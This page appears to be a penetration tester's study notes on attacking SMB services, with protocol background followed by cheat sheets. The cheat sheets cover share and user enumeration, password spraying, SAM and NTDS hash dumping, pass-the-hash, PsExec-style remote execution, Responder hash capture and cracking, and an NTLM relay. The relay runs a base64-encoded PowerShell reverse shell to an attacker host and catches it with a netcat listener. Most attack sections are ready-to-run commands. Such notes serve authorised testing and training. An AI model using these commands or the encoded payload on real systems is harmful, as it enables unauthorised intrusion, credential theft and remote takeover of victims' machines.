Skip to content

Ports 137, 138, 139, 445 SMB

Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. It runs mainly on Windows, BUT with the free software project Samba, there is also a solution that enables the use of SMB in Linux and Unix distributions and thus cross-platform communication via SMB.

Basically a SMB server provides arbitrary parts of its local file system as shares. Therefore the hierarchy visible to a client is partially independent of the structure on the server.

Initially, it was designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138. However, with Windows 2000, Microsoft added the option to run SMB directly over TCP/IP on port 445 without the extra NetBIOS layer. Nowadays, modern Windows operating systems use SMB over TCP but still support the NetBIOS implementation as a failover. Samba is a Unix/Linux-based open-source implementation of the SMB protocol. It also allows Linux/Unix servers and Windows clients to use the same SMB services.

Samba is an alternative variant to the SMB server, developed for Unix-based operating system. Samba implements the Common Internet File System (CIFS) network protocol. CIFS is a "dialect" of SMB. In other words, CIFS is a very specific implementation of the SMB protocol, which in turn was created by Microsoft. This allows Samba to communicate with newer Windows systems. Therefore, it usually is referred to as SMB / CIFS. However, CIFS is the extension of the SMB protocol. So when we pass SMB commands over Samba to an older NetBIOS service, it usually connects to the Samba server over TCP ports 137, 138, 139, but CIFS uses TCP port 445 only. There are several versions of SMB, including outdated versions that are still used in specific infrastructures. Nowadays, modern Windows operating systems use SMB over TCP but still support the NetBIOS implementation as a failover.

SMB Version Supported Features
CIFS Windows NT 4.0 Communication via NetBIOS interface
SMB 1.0 Windows 2000 Direct connection via TCP
SMB 2.0 Windows Vista, Windows Server 2008 Performance upgrades, improved message signing, caching feature
SMB 2.1 Windows 7, Windows Server 2008 R2 Locking mechanisms
SMB 3.0 Windows 8, Windows Server 2012 Multichannel connections, end-to-end encryption, remote storage access
SMB 3.0.2 Windows 8.1, Windows Server 2012 R2
SMB 3.1.1 Windows 10, Windows Server 2016 Integrity checking, AES-128 encryption
  • On Windows, SMB can run directly over port 445 TCP/IP without the need for NetBIOS over TCP/IP
  • but if Windows has NetBIOS enabled, or we are targetting a non-Windows host, we will find SMB running on port 139 TCP/IP. This means that SMB is running with NetBIOS over TCP/IP.

In a network, each host participates in the same workgroup. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network. There can be multiple workgroups on the network at any given time. IBM developed an application programming interface (API) for networking computers called the Network Basic Input/Output System (NetBIOS). The NetBIOS API provided a blueprint for an application to connect and share data with other computers. In a NetBIOS environment, when a machine goes online, it needs a name, which is done through the so-called name registration procedure. Either each host reserves its hostname on the network, or the NetBIOS Name Server (NBNS) is used for this purpose. It also has been enhanced to Windows Internet Name Service (WINS).

Another protocol that is commonly related to SMB is MSRPC (Microsoft Remote Procedure Call). RPC provides an application developer a generic way to execute a procedure (a.k.a. a function) in a local or remote process without having to understand the network protocols used to support the communication,

Footprinting smb

nmap

sudo nmap $ip -sV -sC -p139,445

# Script for nteracting with the SMB service to extract the reported operating system version.
nmap --script smb-os-discovery.nse -p445 $ip

# Service scanning
nmap -A -p445 $ip

smbmap

# Enumerate network shares and access associated permissions.
smbmap -H $ip 

Enumeration

SMBMap

SMBMap tool is widely used and helpful for the enumeration of SMB services. Quick cheat sheet:

# Enumerate network shares and access associated permissions.
smbmap -H $ip

# # Enumerate network shares and access associated permissions with recursivity
smbmap -H $ip -r

# Download a file from a specific share folder
smbmap -H $ip --download "folder\file.txt"

# Upload a file to a specific share folder
smbmap -H $ip --upload originfile.txt "targetfolder\file.txt"

SMBClient: Protocol Negotiation Failed Troubleshooting

Null session connection:

# Connect to smb [-L|--list=HOST] : Selecting the targeted host for the connection request.
smbclient -L -N //$ip
# -N: Suppresses the password prompt.
# -L: retrieve a list of available shares on the remote host

By default smbclient will connect using SMBv1. If you receive the error message protocol negotiation failed when connecting, add the argument -m SMB2 or -m SMB3 to specify SMBv2 or SMBv3 as the minimum security protocol to use when accessing the server.

smbclient -L //$ip -U username -m SMB2

You can use this feature to evaluate what the minimum SMB version is for the server:

smbclient -L //$ip -U username -m NT1 
smbclient -L //$ip -U username -m SMB2 
smbclient -L //$ip -U username -m SMB3 

If all succeed, then the server supports all versions of SMB (including legacy versions, which exposes the server to attack). If one or more fail, the next one that succeeds is the minimum SMB version supported.

rpcclient

See RPC installation and basic commands.

The rpcclient offers us many different requests with which we can execute specific functions on the SMB server to get information. A list of some of these functions can be found at rpcclient. Most importantly, anonymous access to such services can also lead to the discovery of other users (see list of commands for rpcclient tool, who can be attacked with brute-forcing in the most aggressive case.

Brute forcing user enumeration with rpcclient:

for i in $(seq 500 1100);do rpcclient -N -U "" $ip -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Quick cheat sheet:

# Connect to a remote shared folder (same as smbclient in this regard)
rpcclient -U "" $ip
# rpcclient -U'%' $ip

# Server information
srvinfo

# Enumerate all domains that are deployed in the network 
enumdomains

# Provides domain, server, and user information of deployed domains.
querydominfo

# Enumerates all available shares.
netshareenumall

# Provides information about a specific share.
netsharegetinfo <share>

# Enumerates all domain users.
enumdomusers

# Provides information about a specific user.
queryuser <RID>
    # An example:
    # rpcclient $> queryuser 0x3e8

# Provides information about a specific group.
querygroup <ID>

# Enumerate domain groups
enumalsgroups domain

# Enumerate local system groups
enumalsgroups builtin

# Enumerate domain information
enumdomains

# Enumerate user system privileges
enumprivs

# Enumerate Windows password policy information
getdompwinfo

# Create a new user on the remote Windows system using rpcclient with the createdomuser username command. 
createdomuser username rpcclient 
setuserinfo2 username 24 'NewPassword' 
# In this example, the 24 value represents necessary Windows information class constant to set a user password. The value will always be 24 when setting a password.

Enum4Linux

Complete cheat sheet. Enum4linux is another utility that supports null sessions, and it utilizes nmblookup, net, rpcclient, and smbclient to automate some common enumeration from SMB targets such as:

./enum4linux-ng.py $ip -A -C

Quick cheat sheet:

# Enumerate shares
enum4linux.exe -S $ip

# Enumerate users
enum4linux.exe -U $ip     

# Enumerate machine list
enum4linux.exe -M $ip

# Display the password policy in case you need to mount a network authentification attack
enum4linux.exe -enuP $ip

# Specify username to use (default “”)
enum4linux.exe -u $ip

# Specify password to use (default “”)
enum4linux.exe -p $ip     

# Also you can use brute force by adding a file
enum4linux.exe -s /usr/share/enum4linux/share-list.txt $ip  

# Do a nmblookup (similar to nbtstat)
enum4linux.exe -n $ip  
# In the result we see the <20> flag which means there are resources shared

# Enumerates the password policy in the remote system. This is useful to use brute force
enum4linux.exe -P $ip

# Enumerates available shares
enum4linux.exe -s $ip     

If you want to run all these commands in one line:

enum4linux.exe -a $ip

samrdump from impacket

An alternative for user enumeration would be a Python script from Impacket called samrdump.py.

CrackMapExec

CrackMapExec is widely used and helpful for the enumeration of SMB services.

crackmapexec smb $ip --shares -u '' -p ''

Quick cheat sheet:

# Check if we can access a machine
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>

# Spraying password technique
crackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success
# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list
# --local-auth:  if we are targetting a non-domain joined computer, we will need to use the option --local-auth.

# Check which machines we can access in a subnet
crackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>

# Get sam: extract hashes from all users authenticated in the machine 
crackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam

# Get the ntds.dit, given that your user has permissions
crackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds

# See shares
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares

# Enumerate active sessions
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions

# Enumerate users of the domain
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users

# Enumerate logged on users
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users

# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)
crackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>

# Execute commands with flag -x
crackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami

Typical attacks

For some of these attacks we will use smbclient. See installation, connection and syntax in smbclient.

1. Null attack

# Connect to smb [-L|--list=HOST] : Selecting the targeted host for the connection request.
smbclient -L -N //$ip
# -N: Suppresses the password prompt.
# -L: retrieve a list of available shares on the remote host

Smbclient will attempt to connect to the remote host and check if there is any authentication required. If there is, it will ask you for a password for your local username. If we do not specify a specific username to smbclient when attempting to connect to the remote host, it will just use your local machine's username.

Without parameter -N, password will be prompted. We leave the password field blank, simply hitting Enter to tell the script to move along.

After authenticating, we may obtain access to some typical shared folders, such as:

ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.

C$ - Administrative share for the C:\ disk volume. This is where the operating system is hosted.

IPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.
WorkShares - Custom share. 

We will try to connect to each of the shares except for the IPC$ one, which is not valuable for us since it is not browsable as any regular directory would be and does not contain any files that we could use at this stage of our learning experience:

# the use of / and \ might be different if you need to escape some characters
smbclient \\\\$ip\\ADMIN$

# download file.txt
get file.txt

# List files
!ls

# Cat a file.txt
!cat file.txt

2. smb2 security levels

To detect it, run:

nmap --script smb2-security-mode -p 445 $ip
# Add -Pn to avoid firewall if needed

Output:

 smb2-security-mode:

|   2.02:

|_    Message signing enabled but not required

There are three potential results for the message signing:

1. Message signing disabled.

2. Message signing enabled but not required (default for SMB2).

3. Message signing enabled and required.

Options 1 and 2 are vulnerable to SMB relay attacks. Option 3 is the most secure option.

In case 1, attack is similar to the first vuln. In the second case, we can bypass login, leaving in blank the password, but including the user in the request:

smbclient -L \\$ip -U Administrator
# -L: retrieve a list of available shares on the remote host
# -U: user 

smbclient -N -L \\$ip
# -N: Suppresses the password prompt.

Important: Sometimes some jugling is needed:

smbclient -N -L \\$ip
smbclient -N -L \\\\$ip
smbclient -N -L /\/\$ip

3. Signing enabled but not required

HackTheBox machine: Tactics

After running a nmap with scripts enabled (nmap -sC -A 10.129.228.98 -Pn -p-), you get this response:

| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required

This will allow us to use smbclient share enumeration without the need of providing a password when signing into the shared folder. For that we will use a well known user in Windows: Administrator.

smbclient -L $ip -U Administrator

Same thing is possible with rpcclient:

# Connect to a remote shared folder (same as smbclient in this regard)
rpcclient -U "" $ip

4. Brute force

User enumeration with rpcclient

# Brute forcing user enumeration with rpcclient:
for i in $(seq 500 1100);do rpcclient -N -U "" $ip -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Password spraying with crackmapexec

crackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success
# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list
# --local-auth:  if we are targetting a non-domain joined computer, we will need to use the option --local-auth.

Module smb_login in metasploit

With metasploit, use the module: auxiliary/scanner/smb/smb_login

5. Remote Code Execution (RCE) with PsExec, SmbExec, crackMapExec

PsExec is a tool from SysInternals Suite that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PSExec service on the remote machine. The PSExec service then creates a named pipe that can send commands to the system.

Alternatives to PsExec from SysInternals: Impacket PsExec, Impacket SMBExec, Impacket atexec (This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command), CrackMapExec , Metasploit PsExec - Ruby PsExec implementation.

# Connect to a remote machine with a local administrator account
impacket-psexec administrator:'<password>'@$ip

# Connect to a remote machine with a local administrator account
impacket-smbexec administrator:'<password>'@$ip

# Connect to a remote machine with a local administrator account
impacket-atexec  administrator:'<password>'@$ip

RCE with crackmapexec:

#  If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.
crackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec

6. Pass the Hash (PtH) with crackmapexec

# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)
crackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>)

7. Forced Authentication Attacks

We can also abuse the SMB protocol by creating a fake SMB Server to capture users' NetNTLM v1/v2 hashes. The most common tool to perform such operations is the Responder. Responder is an LLMNR, NBT-NS, and MDNS poisoner tool with different capabilities, one of them is the possibility to set up fake services, including SMB, to steal NetNTLM v1/v2 hashes.

./Responder.py -I [interface] -w -d
# -I: Set interface 
# -w: Start the WPAD rogue proxy server. Default value is False
# -d: Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False

# In the HTB machine responder:
./Responder.py -I tun0 -w -d

All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

If you notice multiples hashes for one account this is because NTLMv2 utilizes both a client-side and server-side challenge that is randomized for each interaction. This makes it so the resulting hashes that are sent are salted with a randomized string of numbers. This is why the hashes don't match but still represent the same password.

8. NTLM relay attack

If we capture the hash but cannot crack it, then we can try a NTLM relay attack with impacket-ntlmrelayx or Responder MultiRelay.py.

Step 1: Set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).

cat /etc/responder/Responder.conf | grep 'SMB ='

Step 2: Launch proxy and get SAM database. By default, impacket-ntlmrelayx will dump the SAM database, but we can execute commands by adding the option -c.

# impacket-ntlmrelayx will dump the SAM database by default
impacket-ntlmrelayx --no-http-server -smb2support -t $ip
# --no-http-server:
#  -smb2support: 
# -t: target machine

Step 3: Create a PowerShell reverse shell using https://www.revshells.com/

# Use option to encode it in base 64
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

Step 4: Use the captured hash to launch a reverse shell. Commands in impacket-ntlmrelayx can be executed with flag -c.

 impacket-ntlmrelayx --no-http-server -smb2support -t $ip -c 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'

Step 5: Finally, launch a listener. Once the victim authenticates to our server, we poison the response and make it execute our command to obtain a reverse shell.

nc  -lnvp 9002

9. SMBGhost

SMBGhost with the CVE-2020-0796.

The vulnerability consisted of a compression mechanism of the version SMB v3.1.1 which made Windows 10 versions 1903 and 1909 vulnerable to attack by an unauthenticated attacker. The vulnerability allowed the attacker to gain remote code execution (RCE) and full access to the remote target system. In simple terms, this is an integer overflow vulnerability in a function of an SMB driver that allows system commands to be overwritten while accessing memory.

POC: https://www.exploit-db.com/exploits/48537

Interacting with SMB using Windows & Linux

Windows

Using the explorer

[WINKEY] + [R] to open the Run dialog box and type the file share location, e.g.: \\$IP$\Finance\

Using cmd

net use n: \\$IP$\Finance
# n: map its content to the drive letter `n`


# Provide user and password
net use n: \\$IP$\Finance /user:plaintext Password123

# how many files the shared folder and its subdirectories contain.
dir n: /a-d /s /b | find /c ":\"
# dir   Application
# n:    Directory or drive to search
# /a-d  /a is the attribute and -d means not directories
# /s    Displays files in a specified directory and all subdirectories
# /b    Uses bare format (no heading information or summary)
# | find /c ":\\" :  count how many files exist in the directory and subdirectories

# Return files that contain string "cred" in the name
dir n:\*cred* /s /b

# Return files that contain string "password" within 
findstr /s /i password n:\*.*

Using powershell

# List contents of folder Finance
Get-ChildItem \\$IP$\Finance\

# Connect to a share 
New-PSDrive -Name "N" -Root "\\$IP\Finance" -PSProvider "FileSystem"

# To provide a username and password with Powershell, we need to create a PSCredential. It offers a centralized way to manage usernames, passwords, and credentials.
$username = 'plaintext'
$password = 'Password123'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\$IP\Finance" -PSProvider "FileSystem" -Credential $cred

# Count elements in a folder
(Get-ChildItem -File -Recurse | Measure-Object).Count

# Return files that contain string "cred" in the name
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

# Return files that contain string "password" within 
Get-ChildItem -Recurse -Path N:\ | Select-String "password" -List

Linux

# mount folder
sudo mkdir /mnt/Finance
sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //$IP/Finance /mnt/Finance

# As an alternative, we can use a credential file.
mount -t cifs //$IP/Finance /mnt/Finance -o credentials=/path/credentialfile

# The file credentialfile has to be structured like this:
# username=plaintext
# password=Password123
# domain=.

# Return files that contain string "cred" in the name  
find /mnt/Finance/ -name *cred*

# Return files that contain string "password" within 
grep -rn /mnt/Finance/ -ie password
Last update: 2024-10-24
Created: June 27, 2023 18:57:41